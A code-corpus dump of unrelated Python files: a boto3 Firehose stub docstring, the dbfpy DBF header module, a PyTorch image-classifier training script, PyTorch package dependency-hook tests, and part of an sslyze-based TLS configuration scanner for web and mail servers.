If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n\nProcessingConfiguration (dict) --The data processing configuration.\n\nEnabled (boolean) --Enables or disables data processing.\n\nProcessors (list) --The data processors.\n\n(dict) --Describes a data processor.\n\nType (string) -- [REQUIRED]The type of processor.\n\nParameters (list) --The processor parameters.\n\n(dict) --Describes the processor parameter.\n\nParameterName (string) -- [REQUIRED]The name of the parameter.\n\nParameterValue (string) -- [REQUIRED]The parameter value.\n\n\n\n\n\n\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The Amazon CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
Firehose.Client.exceptions.InvalidArgumentException
Firehose.Client.exceptions.ResourceInUseException
Firehose.Client.exceptions.ResourceNotFoundException
Firehose.Client.exceptions.ConcurrentModificationException
:return: {}
:returns:
(dict) --
"""
pass
| 68.809805 | 14,817 | 0.682587 |
03a877c8706cbafeeafce0b78894f503c89545bb | 9,388 | py | Python | env/lib/python3.6/site-packages/tablib/packages/dbfpy/header.py | anthowen/duplify | 846d01c1b21230937fdf0281b0cf8c0b08a8c24e | [
"MIT"
] | 5,079 | 2015-01-01T03:39:46.000Z | 2022-03-31T07:38:22.000Z | env/lib/python3.6/site-packages/tablib/packages/dbfpy/header.py | anthowen/duplify | 846d01c1b21230937fdf0281b0cf8c0b08a8c24e | [
"MIT"
] | 1,623 | 2015-01-01T08:06:24.000Z | 2022-03-30T19:48:52.000Z | env/lib/python3.6/site-packages/tablib/packages/dbfpy/header.py | anthowen/duplify | 846d01c1b21230937fdf0281b0cf8c0b08a8c24e | [
"MIT"
] | 2,033 | 2015-01-04T07:18:02.000Z | 2022-03-28T19:55:47.000Z | """DBF header definition.
TODO:
- handle encoding of the character fields
(encoding information stored in the DBF header)
"""
"""History (most recent first):
16-sep-2010 [als] fromStream: fix century of the last update field
11-feb-2007 [als] added .ignoreErrors
10-feb-2007 [als] added __getitem__: return field definitions
by field name or field number (zero-based)
04-jul-2006 [als] added export declaration
15-dec-2005 [yc] created
"""
__version__ = "$Revision: 1.6 $"[11:-2]
__date__ = "$Date: 2010/09/16 05:06:39 $"[7:-2]
__all__ = ["DbfHeader"]
try:
import cStringIO
except ImportError:
# when we're in python3, we cStringIO has been replaced by io.StringIO
import io as cStringIO
import datetime
import struct
import time
from . import fields
from . import utils
class DbfHeader(object):
    """Dbf header definition.

    For more information about dbf header format visit
    `http://www.clicketyclick.dk/databases/xbase/format/dbf.html#DBF_STRUCT`

    Examples:

        Create an empty dbf header and add some field definitions:

            dbfh = DbfHeader()
            dbfh.addField(("name", "C", 10))
            dbfh.addField(("date", "D"))
            dbfh.addField(DbfNumericFieldDef("price", 5, 2))

        Create a dbf header with field definitions:

            dbfh = DbfHeader([
                ("name", "C", 10),
                ("date", "D"),
                DbfNumericFieldDef("price", 5, 2),
            ])

    """

    # NOTE(review): this class is written for Python 2 -- see `basestring`
    # in __getitem__, `ord()` applied to single characters of stream data
    # in fromStream, and `chr()` / str concatenation written to the stream
    # in write/toString.  Confirm the target interpreter before reusing.

    __slots__ = ("signature", "fields", "lastUpdate", "recordLength",
        "recordCount", "headerLength", "changed", "_ignore_errors")

    ## instance construction and initialization methods

    def __init__(self, fields=None, headerLength=0, recordLength=0,
        recordCount=0, signature=0x03, lastUpdate=None, ignoreErrors=False,
    ):
        """Initialize instance.

        Arguments:
            fields:
                a list of field definitions;
            recordLength:
                size of the records;
            headerLength:
                size of the header;
            recordCount:
                number of records stored in DBF;
            signature:
                version number (aka signature). using 0x03 as a default meaning
                "File without DBT". for more information about this field visit
                ``http://www.clicketyclick.dk/databases/xbase/format/dbf.html#DBF_NOTE_1_TARGET``
            lastUpdate:
                date of the DBF's update. this could be a string ('yymmdd' or
                'yyyymmdd'), timestamp (int or float), datetime/date value,
                a sequence (assuming (yyyy, mm, dd, ...)) or an object having
                callable ``ticks`` field.
            ignoreErrors:
                error processing mode for DBF fields (boolean)

        """
        self.signature = signature
        if fields is None:
            self.fields = []
        else:
            self.fields = list(fields)
        # utils.getDate normalizes the many accepted lastUpdate formats
        # (string, timestamp, sequence, date/datetime) to a date value.
        self.lastUpdate = utils.getDate(lastUpdate)
        self.recordLength = recordLength
        self.headerLength = headerLength
        self.recordCount = recordCount
        # Assigning the property also pushes the flag down to any fields
        # passed in via the `fields` argument.
        self.ignoreErrors = ignoreErrors
        # XXX: I'm not sure this is safe to
        # initialize `self.changed` in this way
        self.changed = bool(self.fields)

    # @classmethod
    def fromString(cls, string):
        """Return header instance from the string object."""
        return cls.fromStream(cStringIO.StringIO(str(string)))
    fromString = classmethod(fromString)

    # @classmethod
    def fromStream(cls, stream):
        """Return header object from the stream."""
        stream.seek(0)
        # The first 32 bytes are the fixed-size DBF file header.
        _data = stream.read(32)
        # Bytes 4-11: record count (uint32), header length (uint16) and
        # record length (uint16), all little-endian.
        (_cnt, _hdrLen, _recLen) = struct.unpack("<I2H", _data[4:12])
        #reserved = _data[12:32]
        # Byte 1 holds the year of the last update as an offset.
        _year = ord(_data[1])
        if _year < 80:
            # dBase II started at 1980. It is quite unlikely
            # that actual last update date is before that year.
            _year += 2000
        else:
            _year += 1900
        ## create header object
        # Byte 0 is the signature; bytes 2-3 are month and day.
        _obj = cls(None, _hdrLen, _recLen, _cnt, ord(_data[0]),
            (_year, ord(_data[2]), ord(_data[3])))
        ## append field definitions
        # position 0 is for the deletion flag
        _pos = 1
        _data = stream.read(1)
        # The field definitions are ended either by \x0D OR a newline
        # character, so we need to handle both when reading from a stream.
        # When writing, dbfpy appears to write newlines instead of \x0D.
        while _data[0] not in ["\x0D", "\n"]:
            # Each field descriptor is 32 bytes; one is already consumed.
            _data += stream.read(31)
            # Byte 11 of the descriptor is the field type code; look up
            # the matching DbfFieldDef subclass and parse the descriptor.
            _fld = fields.lookupFor(_data[11]).fromString(_data, _pos)
            _obj._addField(_fld)
            _pos = _fld.end
            _data = stream.read(1)
        return _obj
    fromStream = classmethod(fromStream)

    ## properties

    # Components of the last-update date, exposed read-only.
    year = property(lambda self: self.lastUpdate.year)
    month = property(lambda self: self.lastUpdate.month)
    day = property(lambda self: self.lastUpdate.day)

    def ignoreErrors(self, value):
        """Update `ignoreErrors` flag on self and all fields"""
        self._ignore_errors = value = bool(value)
        for _field in self.fields:
            _field.ignoreErrors = value
    ignoreErrors = property(
        lambda self: self._ignore_errors,
        ignoreErrors,
        doc="""Error processing mode for DBF field value conversion

        if set, failing field value conversion will return
        ``INVALID_VALUE`` instead of raising conversion error.

        """)

    ## object representation

    def __repr__(self):
        # Human-readable dump of the header followed by one line per
        # field definition (name, type, length, decimal count).
        _rv = """\
Version (signature): 0x%02x
Last update: %s
Header length: %d
Record length: %d
Record count: %d
FieldName Type Len Dec
""" % (self.signature, self.lastUpdate, self.headerLength,
        self.recordLength, self.recordCount)
        _rv += "\n".join(
            ["%10s %4s %3s %3s" % _fld.fieldInfo() for _fld in self.fields]
        )
        return _rv

    ## internal methods

    def _addField(self, *defs):
        """Internal variant of the `addField` method.

        This method doesn't set `self.changed` field to True.

        Return value is a length of the appended records.

        Note: this method doesn't modify ``recordLength`` and
        ``headerLength`` fields. Use `addField` instead of this
        method if you don't exactly know what you're doing.

        """
        # ensure we have dbf.DbfFieldDef instances first (instantiation
        # from the tuple could raise an error, in such a case I don't
        # wanna add any of the definitions -- all will be ignored)
        _defs = []
        _recordLength = 0
        for _def in defs:
            if isinstance(_def, fields.DbfFieldDef):
                _obj = _def
            else:
                # Accept (name, type[, length[, decimals]]) tuples; pad
                # any missing trailing items with None.
                (_name, _type, _len, _dec) = (tuple(_def) + (None,) * 4)[:4]
                _cls = fields.lookupFor(_type)
                _obj = _cls(_name, _len, _dec,
                    ignoreErrors=self._ignore_errors)
            _recordLength += _obj.length
            _defs.append(_obj)
        # and now extend field definitions and
        # update record length
        self.fields += _defs
        return _recordLength

    ## interface methods

    def addField(self, *defs):
        """Add field definition to the header.

        Examples:
            dbfh.addField(
                ("name", "C", 20),
                dbf.DbfCharacterFieldDef("surname", 20),
                dbf.DbfDateFieldDef("birthdate"),
                ("member", "L"),
            )
            dbfh.addField(("price", "N", 5, 2))
            dbfh.addField(dbf.DbfNumericFieldDef("origprice", 5, 2))

        """
        _oldLen = self.recordLength
        self.recordLength += self._addField(*defs)
        if not _oldLen:
            # Reserve one byte for the record deletion flag the first
            # time any field is added.
            self.recordLength += 1
        # XXX: may be just use:
        # self.recordeLength += self._addField(*defs) + bool(not _oldLen)
        # recalculate headerLength:
        # 32-byte fixed header + 32 bytes per field descriptor + 1
        # terminator byte.
        self.headerLength = 32 + (32 * len(self.fields)) + 1
        self.changed = True

    def write(self, stream):
        """Encode and write header to the stream."""
        stream.seek(0)
        stream.write(self.toString())
        # Field descriptors follow the 32-byte header...
        stream.write("".join([_fld.toString() for _fld in self.fields]))
        # ...terminated by a carriage return (matches fromStream's loop).
        stream.write(chr(0x0D)) # cr at end of all hdr data
        self.changed = False

    def toString(self):
        """Returned 32 chars length string with encoded header."""
        # Layout mirrors fromStream: signature byte, 3 date bytes,
        # record count (uint32), header and record lengths (uint16 each),
        # then 20 reserved NUL bytes.
        return struct.pack("<4BI2H",
            self.signature,
            self.year - 1900,
            self.month,
            self.day,
            self.recordCount,
            self.headerLength,
            self.recordLength) + "\0" * 20

    def setCurrentDate(self):
        """Update ``self.lastUpdate`` field with current date value."""
        self.lastUpdate = datetime.date.today()

    def __getitem__(self, item):
        """Return a field definition by numeric index or name string"""
        if isinstance(item, basestring):
            # Field names are stored upper-case; normalize the lookup key.
            _name = item.upper()
            for _field in self.fields:
                if _field.name == _name:
                    return _field
            else:
                # for/else: no field matched the requested name.
                raise KeyError(item)
        else:
            # item must be field index
            return self.fields[item]
# vim: et sts=4 sw=4 :
| 34.014493 | 97 | 0.583085 |
017b190ed100e2917c82eadad7ce3ff22f07a52c | 7,772 | py | Python | train.py | koderjoker/Image-Classifier | 161b61425eb1ff906ac9a685f2750ef8fb0261ac | [
"MIT"
] | null | null | null | train.py | koderjoker/Image-Classifier | 161b61425eb1ff906ac9a685f2750ef8fb0261ac | [
"MIT"
] | null | null | null | train.py | koderjoker/Image-Classifier | 161b61425eb1ff906ac9a685f2750ef8fb0261ac | [
"MIT"
] | 1 | 2021-04-14T17:29:36.000Z | 2021-04-14T17:29:36.000Z | import argparse
import torch
from torch import nn
from torch import optim
from torchvision import transforms, datasets, models
from collections import OrderedDict
import json
#Take inputs from user
parser = argparse.ArgumentParser()
parser.add_argument('data_directory', type=str, help='Train a new network on a data set')
parser.add_argument('--save_dir', type=str, help='Set directory to save checkpoint', default='./')
parser.add_argument('--category', type=str, help='Load categories', default='cat_to_name.json')
parser.add_argument('--arch', type=str, help='Choose architecture', default='vgg16')
parser.add_argument('--learning_rate', type=float, help='Set learning rate', default=0.0001)
parser.add_argument('--hidden_units', type=int, help='Set hidden units', default=510)
parser.add_argument('--epochs', type=int, help='Set epochs', default=8)
parser.add_argument('--dropout', type=float, help='Set dropout', default=0.1)
parser.add_argument('--gpu', type=str, help='Use GPU for training', default='gpu')
args = parser.parse_args()

#Start training! :)
# Load data (assuming train/valid/test sub-folders exist under the data directory)
data_dir = args.data_directory
train_dir = data_dir + '/train'
valid_dir = data_dir + '/valid'
test_dir = data_dir + '/test'

# Define transformations: random crop/flip/rotation augmentation for the
# training split; crop + ImageNet normalization for validation and test.
data_transforms = {'train_transforms': transforms.Compose([transforms.RandomResizedCrop(224),
                                                           transforms.RandomHorizontalFlip(),
                                                           transforms.RandomRotation(30),
                                                           transforms.ToTensor(),
                                                           transforms.Normalize([0.485, 0.456, 0.406],
                                                                                [0.229, 0.224, 0.225])]),
                   'valid_transforms': transforms.Compose([transforms.RandomResizedCrop(224),
                                                           transforms.ToTensor(),
                                                           transforms.Normalize([0.485, 0.456, 0.406],
                                                                                [0.229, 0.224, 0.225])]),
                   'test_transforms': transforms.Compose([transforms.RandomResizedCrop(224),
                                                          transforms.ToTensor(),
                                                          transforms.Normalize([0.485, 0.456, 0.406],
                                                                               [0.229, 0.224, 0.225])])
                   }

# Load the datasets
image_datasets = {'train_data': datasets.ImageFolder(train_dir, transform=data_transforms['train_transforms']),
                  'valid_data': datasets.ImageFolder(valid_dir, transform=data_transforms['valid_transforms']),
                  # Fix: load the test split from test_dir (it previously
                  # reused valid_dir, leaving test_dir defined but unused and
                  # making "test" a duplicate of the validation split).
                  'test_data': datasets.ImageFolder(test_dir, transform=data_transforms['test_transforms'])
                  }

# Define the dataloaders (training uses a larger batch and shuffling for SGD)
dataloaders = {'trainloader': torch.utils.data.DataLoader(image_datasets['train_data'], batch_size=64, shuffle=True),
               'validloader': torch.utils.data.DataLoader(image_datasets['valid_data'], batch_size=32, shuffle=True),
               'testloader': torch.utils.data.DataLoader(image_datasets['test_data'], batch_size=32, shuffle=True)
               }
# Load a model and create a classifier
def load_train_model(arch, category, hidden_units, dropout, gpu, learning_rate, epochs, save_dir):
    """Build a classifier head on a pretrained backbone, train it, and save a checkpoint.

    Reads the module-level ``dataloaders`` / ``image_datasets`` globals for
    the training and validation data, and calls the module-level
    ``validation`` and ``save`` helpers.

    Arguments:
        arch: pretrained backbone to use ('vgg16' or 'densenet121').
        category: path to a JSON file mapping class ids to names; only its
            length is used (number of output classes).
        hidden_units: width of the classifier's single hidden layer.
        dropout: dropout probability between hidden and output layers.
        gpu: 'gpu' to train on cuda:0, 'cpu' to train on the CPU.
        learning_rate: Adam learning rate.
        epochs: number of passes over the training data.
        save_dir: directory the checkpoint is written to (via ``save``).

    NOTE(review): any other value of ``arch`` leaves ``model`` /
    ``in_features`` unbound, and any other value of ``gpu`` leaves
    ``device`` unbound -- both raise NameError a few lines later.
    Consider validating arguments up front.
    """
    # Load the category -> name mapping; only its size matters here.
    with open(category, 'r') as f:
        cat_to_name = json.load(f)
    # Choose from vgg16 and densenet121 architectures.  in_features must
    # match the classifier input size of the chosen torchvision model.
    if arch == "vgg16":
        model = models.vgg16(pretrained=True)
        in_features = 25088
    elif arch == "densenet121":
        model = models.densenet121(pretrained=True)
        in_features = 1024
    # Output size is the number of image classes.
    out_features = len(cat_to_name)
    # Freeze the pretrained feature extractor; only the new classifier
    # head (replaced below) is trained.
    for param in model.parameters():
        param.requires_grad = False
    # Create the classifier head: one hidden layer + LogSoftmax output
    # (paired with NLLLoss below).
    classifier = nn.Sequential(OrderedDict([
        ('fc1', nn.Linear(in_features, hidden_units)),
        ('relu1', nn.ReLU()),
        ('dropout1', nn.Dropout(dropout)),
        ('fc2', nn.Linear(hidden_units, out_features)),
        ('output', nn.LogSoftmax(dim=1))
    ]))
    # Replace the pretrained classifier with the self-built classifier.
    model.classifier = classifier
    # Use the GPU if requested.
    if gpu == "gpu":
        device = "cuda:0"
    elif gpu == "cpu":
        device = "cpu"
    model.to(device)
    # Optimizer only sees the (unfrozen) classifier parameters.
    optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate)
    # Negative log likelihood loss, matching the LogSoftmax output layer.
    criterion = nn.NLLLoss()
    # Train classifier layers using backpropagation; track training loss
    # and periodically report validation loss/accuracy.
    epoch = epochs
    print_every = 50
    steps = 0
    for e in range(epoch):
        running_loss = 0
        for images, labels in iter(dataloaders['trainloader']):
            # Training mode - dropout on.
            model.train()
            steps += 1
            # Shift the batch to the selected device.
            images, labels = images.to(device), labels.to(device)
            # Reset accumulated gradients.
            optimizer.zero_grad()
            # Forward and backward passes.
            output = model.forward(images)
            loss = criterion(output, labels)
            loss.backward()
            optimizer.step()
            # Track loss.
            running_loss += loss.item()
            # Report progress every `print_every` batches.
            if steps % print_every == 0:
                # Evaluation mode - dropout turned off.
                model.eval()
                # Turn off gradients while validating.
                with torch.no_grad():
                    valid_loss, accuracy = validation(model, dataloaders['validloader'], criterion, device)
                print("Epoch: {}/{}..".format(e+1,epoch),
                      "Training Loss: {:.3f}..".format(running_loss/print_every),
                      "Validation Loss: {:.3f}..".format(valid_loss/len(dataloaders['validloader'])),
                      "Validation Accuracy: {:.3f}%..".format(100*(accuracy/len(dataloaders['validloader']))))
                running_loss = 0
                # Training mode - dropout turned back on.
                model.train()
    # Move back to the CPU so the checkpoint can be loaded anywhere.
    model.to('cpu')
    save(arch, classifier, epoch, optimizer.state_dict(), model.state_dict(), image_datasets['train_data'].class_to_idx, save_dir)
# Validation pass helper used by load_train_model.
def validation(model, loader, criterion, device):
    """Evaluate `model` over every batch in `loader`.

    Returns a (total_loss, total_accuracy) pair where each value is the
    sum over batches: `total_loss` accumulates the criterion value per
    batch and `total_accuracy` accumulates the per-batch fraction of
    correct top-1 predictions.  Divide both by len(loader) for averages.
    """
    total_loss = 0
    total_accuracy = 0
    for inputs, targets in iter(loader):
        # Move the batch onto the evaluation device.
        inputs = inputs.to(device)
        targets = targets.to(device)
        # Forward pass and per-batch loss.
        log_probs = model.forward(inputs)
        batch_loss = criterion(log_probs, targets)
        total_loss += batch_loss.item()
        # Model emits log-probabilities; exponentiate, then take the
        # arg-max class per sample for the accuracy count.
        probs = torch.exp(log_probs)
        predicted = probs.max(dim=1)[1]
        matches = (targets.data == predicted)
        total_accuracy += matches.type(torch.FloatTensor).mean()
    return total_loss, total_accuracy
def save(arch, classifier, epoch, optimizer, state_dict, class_to_idx, save_dir):
    """Serialize the trained model state to `save_dir`/checkpoint.pth.

    Arguments:
        arch: architecture name string ('vgg16' or 'densenet121').
        classifier: the classifier head module.
        epoch: number of epochs the model was trained for.
        optimizer: the optimizer's state_dict.
        state_dict: the model's state_dict.
        class_to_idx: class-name -> index mapping from the training set.
        save_dir: directory to write the checkpoint into.
    """
    import os  # local import: the module header does not import os

    checkpoint = {'model': arch,
                  'classifier': classifier,
                  'epoch': epoch,
                  'optimizer': optimizer,
                  'state_dict': state_dict,
                  'class_to_idx': class_to_idx
                  }
    # Fix: join path components with os.path.join so save_dir works with
    # or without a trailing separator (the original `save_dir +
    # 'checkpoint.pth'` produced e.g. "outcheckpoint.pth" for
    # --save_dir out).
    torch.save(checkpoint, os.path.join(save_dir, 'checkpoint.pth'))
# Kick off training with the parsed command-line arguments.
load_train_model(args.arch, args.category, args.hidden_units, args.dropout, args.gpu, args.learning_rate, args.epochs, args.save_dir)
0541d6a77e2e8cb6b20b083c3844ed74a8c6877d | 3,958 | py | Python | test/package/test_dependency_hooks.py | Hacky-DH/pytorch | 80dc4be615854570aa39a7e36495897d8a040ecc | [
"Intel"
] | 60,067 | 2017-01-18T17:21:31.000Z | 2022-03-31T21:37:45.000Z | test/package/test_dependency_hooks.py | Hacky-DH/pytorch | 80dc4be615854570aa39a7e36495897d8a040ecc | [
"Intel"
] | 66,955 | 2017-01-18T17:21:38.000Z | 2022-03-31T23:56:11.000Z | test/package/test_dependency_hooks.py | Hacky-DH/pytorch | 80dc4be615854570aa39a7e36495897d8a040ecc | [
"Intel"
] | 19,210 | 2017-01-18T17:45:04.000Z | 2022-03-31T23:51:56.000Z | from io import BytesIO
from torch.package import (
PackageExporter,
)
from torch.testing._internal.common_utils import run_tests
try:
from .common import PackageTestCase
except ImportError:
# Support the case where we run this file directly.
from common import PackageTestCase
class TestDependencyHooks(PackageTestCase):
    """Dependency management hooks API tests.

    Covers:
    - register_mock_hook()
    - register_extern_hook()
    """

    def test_single_hook(self):
        """A registered extern hook sees every externed module."""
        recorded = set()

        def record_extern(package_exporter, module_name):
            recorded.add(module_name)

        sink = BytesIO()
        with PackageExporter(sink) as exporter:
            exporter.extern(["package_a.subpackage", "module_a"])
            exporter.register_extern_hook(record_extern)
            exporter.save_source_string("foo", "import module_a")

        self.assertEqual(recorded, {"module_a"})

    def test_multiple_extern_hooks(self):
        """Extern hooks fire in registration order."""
        recorded = set()

        def add_hook(package_exporter, module_name):
            recorded.add(module_name)

        # Ordering check: remove() raises KeyError unless add_hook already
        # ran for the same module name.
        def remove_hook(package_exporter, module_name):
            recorded.remove(module_name)

        sink = BytesIO()
        with PackageExporter(sink) as exporter:
            exporter.extern(["package_a.subpackage", "module_a"])
            exporter.register_extern_hook(add_hook)
            exporter.register_extern_hook(remove_hook)
            exporter.save_source_string("foo", "import module_a")

        self.assertEqual(recorded, set())

    def test_multiple_mock_hooks(self):
        """Mock hooks fire in registration order."""
        recorded = set()

        def add_hook(package_exporter, module_name):
            recorded.add(module_name)

        # Ordering check: remove() raises KeyError unless add_hook already
        # ran for the same module name.
        def remove_hook(package_exporter, module_name):
            recorded.remove(module_name)

        sink = BytesIO()
        with PackageExporter(sink) as exporter:
            exporter.mock(["package_a.subpackage", "module_a"])
            exporter.register_mock_hook(add_hook)
            exporter.register_mock_hook(remove_hook)
            exporter.save_source_string("foo", "import module_a")

        self.assertEqual(recorded, set())

    def test_remove_hooks(self):
        """A hook removed through its handle no longer fires."""
        first_seen = set()
        second_seen = set()

        def first_hook(package_exporter, module_name):
            first_seen.add(module_name)

        def second_hook(package_exporter, module_name):
            second_seen.add(module_name)

        sink = BytesIO()
        with PackageExporter(sink) as exporter:
            exporter.extern(["package_a.subpackage", "module_a"])
            handle = exporter.register_extern_hook(first_hook)
            exporter.register_extern_hook(second_hook)
            handle.remove()
            exporter.save_source_string("foo", "import module_a")

        self.assertEqual(first_seen, set())
        self.assertEqual(second_seen, {"module_a"})

    def test_extern_and_mock_hook(self):
        """Extern hooks and mock hooks fire independently of each other."""
        extern_seen = set()
        mock_seen = set()

        def extern_hook(package_exporter, module_name):
            extern_seen.add(module_name)

        def mock_hook(package_exporter, module_name):
            mock_seen.add(module_name)

        sink = BytesIO()
        with PackageExporter(sink) as exporter:
            exporter.extern("module_a")
            exporter.mock("package_a")
            exporter.register_extern_hook(extern_hook)
            exporter.register_mock_hook(mock_hook)
            exporter.save_source_string("foo", "import module_a; import package_a")

        self.assertEqual(extern_seen, {"module_a"})
        self.assertEqual(mock_seen, {"package_a"})
if __name__ == "__main__":
    # Support running this test file directly (outside the test runner).
    run_tests()
| 32.178862 | 95 | 0.662961 |
61a2c4cc07165652fda0c8a7b0dcda83f0764873 | 29,962 | py | Python | scanners/sslyze.py | eddietejeda/domain-scan | ad2bfaae5b17437c994d8f1ce50c9f9bcecade8b | [
"CC0-1.0"
] | null | null | null | scanners/sslyze.py | eddietejeda/domain-scan | ad2bfaae5b17437c994d8f1ce50c9f9bcecade8b | [
"CC0-1.0"
] | null | null | null | scanners/sslyze.py | eddietejeda/domain-scan | ad2bfaae5b17437c994d8f1ce50c9f9bcecade8b | [
"CC0-1.0"
] | null | null | null | ###
# Inspect a site's TLS configuration using sslyze.
#
# If data exists for a domain from `pshtt`, will check results
# and only process domains with valid HTTPS, or broken chains.
#
# Supported options:
#
# --sslyze-serial - If set, will use a synchronous (single-threaded
# in-process) scanner. Defaults to true.
# --sslyze-certs - If set, will use the CertificateInfoScanner and
# return certificate info. Defaults to true.
###
import logging
from typing import Any
from sslyze.server_connectivity_tester import ServerConnectivityTester, ServerConnectivityError
from sslyze.synchronous_scanner import SynchronousScanner
from sslyze.concurrent_scanner import ConcurrentScanner, PluginRaisedExceptionScanResult
from sslyze.plugins.openssl_cipher_suites_plugin import Tlsv10ScanCommand, Tlsv11ScanCommand, Tlsv12ScanCommand, Tlsv13ScanCommand, Sslv20ScanCommand, Sslv30ScanCommand
from sslyze.plugins.certificate_info_plugin import CertificateInfoScanCommand
from sslyze.ssl_settings import TlsWrappedProtocolEnum
import idna
import cryptography
import cryptography.hazmat.backends.openssl
from cryptography.hazmat.primitives.serialization import Encoding
from cryptography.hazmat.primitives.asymmetric import ec, dsa, rsa
from utils import FAST_CACHE_KEY, utils
# Number of seconds to wait during sslyze connection check.
# Not much patience here, and very willing to move on.
network_timeout = 5

# Advertise Lambda support.
# NOTE(review): presumably read by the domain-scan framework to decide
# whether this scanner may be dispatched to AWS Lambda -- confirm against
# the scanner loader.
lambda_support = True
# If we have pshtt data, use it to skip some domains, and to adjust
# scan hostnames to canonical URLs where we can.
#
# If we have trustymail data, use it to identify any mail servers that
# support STARTTLS so we can scan them.
#
# Check the fastcache to determine if we have already tested any of
# the mail servers when scanning other domains.
def init_domain(domain, environment, options):
    """Pre-scan hook: choose which hosts (web and mail) to scan for a domain.

    Uses cached pshtt data to skip domains without HTTPS and to pick the
    canonical (www or bare) hostname, cached trustymail data to find
    STARTTLS-capable mail servers, and the fast cache to reuse results for
    mail servers already scanned under another domain.
    """
    targets = []
    reused_results = []
    cache_dir = options.get('_', {}).get('cache_dir', './cache')

    # Skip the web endpoint entirely when pshtt saw no HTTPS support.
    if utils.domain_doesnt_support_https(domain, cache_dir=cache_dir):
        logging.warning('\tHTTPS not supported for {}'.format(domain))
    else:
        # Scan the canonical hostname: www-prefixed if pshtt says so.
        if utils.domain_uses_www(domain, cache_dir=cache_dir):
            web_host = 'www.%s' % domain
        else:
            web_host = domain
        targets.append({
            'hostname': web_host,
            'port': 443,
            'starttls_smtp': False
        })

    # SMTP servers are much more sensitive to repeated connections than
    # HTTP/HTTPS servers, and multiple domains often share one mail host,
    # so reuse fast-cached results from earlier domains when available.
    fast_cache = environment.get(FAST_CACHE_KEY, {})
    mail_servers = utils.domain_mail_servers_that_support_starttls(domain, cache_dir=cache_dir)
    for mail_server in mail_servers:
        cached_value = fast_cache.get(mail_server, None)
        if cached_value is not None:
            logging.debug('Using cached data for {}'.format(mail_server))
            reused_results.append(cached_value)
            continue
        logging.debug('Adding {} to list to be scanned'.format(mail_server))
        host_and_port = mail_server.split(':')
        targets.append({
            'hostname': host_and_port[0],
            'port': int(host_and_port[1]),
            'starttls_smtp': True
        })

    if not targets:
        logging.warning('\tNo hosts to scan for {}'.format(domain))

    return {
        'hosts_to_scan': targets,
        'cached_data': reused_results
    }
# Run sslyze on the given domain.
def scan(domain, environment, options):
    """Run sslyze against every host selected for this domain.

    Falls back to scanning the bare domain on port 443 when init_domain
    supplied no host list, then appends any fast-cached mail-server
    results gathered during init_domain.
    """
    fallback_hosts = [{
        'hostname': domain,
        'port': 443,
        'starttls_smtp': False
    }]
    results = []
    for host in environment.get('hosts_to_scan', fallback_hosts):
        data = {
            'hostname': host.get('hostname'),
            'port': host.get('port'),
            'starttls_smtp': host.get('starttls_smtp'),
            'protocols': {},
            'config': {},
            'certs': {},
            'errors': []
        }
        # Defensive: a missing response is treated as a failed connection.
        if run_sslyze(data, environment, options) is None:
            error = "No valid target for scanning, couldn't connect."
            logging.warning(error)
            data['errors'].append(error)
        # Collapse accumulated errors into a single string for output.
        data['errors'] = ' '.join(data['errors'])
        results.append(data)
    # Return fresh results together with already-cached ones (if any).
    results.extend(environment['cached_data'])
    return results
def post_scan(domain: str, data: Any, environment: dict, options: dict):
    """Post-scan hook for sslyze.

    Add SMTP results to the fast cache, keyed by 'hostname:port'.
    Existing entries are never overwritten: an entry that appeared while
    we were running was produced earlier and is less likely to have
    triggered any defenses on the mail server.

    Parameters
    ----------
    domain : str
        The domain being scanned.
    data : Any
        The result returned by the scan function for this domain.
    environment : dict
        The environment data structure associated with the scan that
        produced the results in data.
    options : dict
        The CLI options.
    """
    # FIX: use `.get` with a False default instead of indexing — every
    # other option lookup in this module tolerates a missing key, and a
    # missing flag should mean "fast cache enabled", not a KeyError.
    if options.get('no_fast_cache', False) or data is None:
        return

    if FAST_CACHE_KEY not in environment:
        environment[FAST_CACHE_KEY] = {}
    fast_cache = environment[FAST_CACHE_KEY]

    # Only mail-server (STARTTLS SMTP) records are worth caching.
    for record in data:
        if record['starttls_smtp']:
            key = '{}:{}'.format(record['hostname'], record['port'])
            # Avoid overwriting data cached by someone else while we ran.
            if key not in fast_cache:
                fast_cache[key] = record
# Given a response dict, turn it into CSV rows.
def to_rows(data):
    """Flatten scan-result dicts into CSV rows, in the order of `headers`."""
    rows = []
    for result in data:
        protocols = result['protocols']
        config = result['config']
        certs = result['certs']
        ev = certs.get('ev', {})
        rows.append([
            result['hostname'],
            result['port'],
            result['starttls_smtp'],
            protocols.get('sslv2'), protocols.get('sslv3'),
            protocols.get('tlsv1.0'), protocols.get('tlsv1.1'),
            protocols.get('tlsv1.2'), protocols.get('tlsv1.3'),
            config.get('any_dhe'), config.get('all_dhe'),
            config.get('any_rc4'), config.get('all_rc4'),
            config.get('any_3des'),
            certs.get('key_type'), certs.get('key_length'),
            certs.get('leaf_signature'),
            certs.get('any_sha1_served'),
            certs.get('any_sha1_constructed'),
            certs.get('not_before'), certs.get('not_after'),
            certs.get('served_issuer'), certs.get('constructed_issuer'),
            ev.get('asserted'), ev.get('trusted'),
            ", ".join(ev.get('trusted_oids', [])),
            ", ".join(ev.get('trusted_browsers', [])),
            certs.get('is_symantec_cert'),
            certs.get('symantec_distrust_date'),
            ', '.join(result.get('ciphers', [])),
            result.get('errors')
        ])
    return rows
# CSV column names; the order must stay in sync with the field order
# produced by to_rows() above.
headers = [
    "Scanned Hostname",
    "Scanned Port",
